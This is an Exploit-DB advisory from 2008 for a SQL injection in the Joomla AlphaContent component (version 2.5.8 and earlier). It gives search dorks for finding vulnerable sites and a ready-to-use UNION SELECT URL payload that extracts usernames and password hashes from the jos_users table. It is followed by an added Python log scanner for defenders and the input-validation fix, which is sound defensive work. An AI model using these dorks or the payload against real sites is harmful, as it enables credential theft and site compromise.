Joomla Component alphacontent <= 2.5.8 id SQL Injection Vulnerability

2008-03-25T00:00:00
ID EDB-ID:5310
Type exploitdb
Reporter cO2
Modified 2008-03-25T00:00:00

Description

Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability. CVE-2008-1559. Webapps exploit for php platform

                                        
##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~]  Version() : '2.5.8 '
###########################################
#
# DORK 1 :  inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
 
index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
###########################################
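
For defenders reviewing web server logs for this issue, the following is an added example (not part of the original advisory or the component's code). It flags com_alphacontent requests whose id parameter is not a plain integer. It assumes combined-format access logs and that legitimate id values are decimal integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate article id is a plain decimal integer.
VALID_ID_RE = re.compile(r"\d{1,10}")


def is_suspicious(request_target):
    """True if a com_alphacontent request carries a non-integer id."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if "com_alphacontent" not in query.get("option", []):
        return False
    # parse_qs percent-decodes, so encoded values are checked in clear form.
    return any(not VALID_ID_RE.fullmatch(v) for v in query.get("id", []))


def scan(log_lines):
    """Return (client_ip, request_target) for each flagged log line."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2008:10:00:01 +0000] "GET /index.php?option=com_alphacontent&section=6&cat=15&task=view&id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Mar/2008:10:00:05 +0000] "GET /index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,2 HTTP/1.1" 200 4800',
    '198.51.100.7 - - [25/Mar/2008:10:00:09 +0000] "GET /index.php?option=com_alphacontent&task=view&id=42%27 HTTP/1.1" 200 4800',
    '203.0.113.4 - - [25/Mar/2008:10:00:12 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(ip, target)
```

The same allow-list rule (reject any id that is not an integer) is the input check the component itself needs before the value reaches a query.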

side note:
  <name>alphacontent</name>
  <creationDate>25 Jul 2007</creationDate>
  <author>Bernard Gilly</author>
  <copyright>This component is released under the GNU/GPL License.</copyright>
  <authorEmail>contact@visualclinic.fr</authorEmail>
  <authorUrl>www.visualclinic.fr</authorUrl>
  <version>2.5.8</version>
  <description>Directory component with alphabetical indexes for Joomla's Content</description>

  <name>alphacontent</name>
  <creationDate>16 Sept 2006</creationDate>
  <author>Bernard Gilly</author>
  <copyright>This component is released under the GNU/GPL License.</copyright>
  <authorEmail>contact@visualclinic.fr</authorEmail>
  <authorUrl>www.visualclinic.fr</authorUrl>
  <version>2.5.4</version>
  <description>Directory component and alphabetical indexes for Mambo/Joomla's Content</description>

# milw0rm.com [2008-03-25]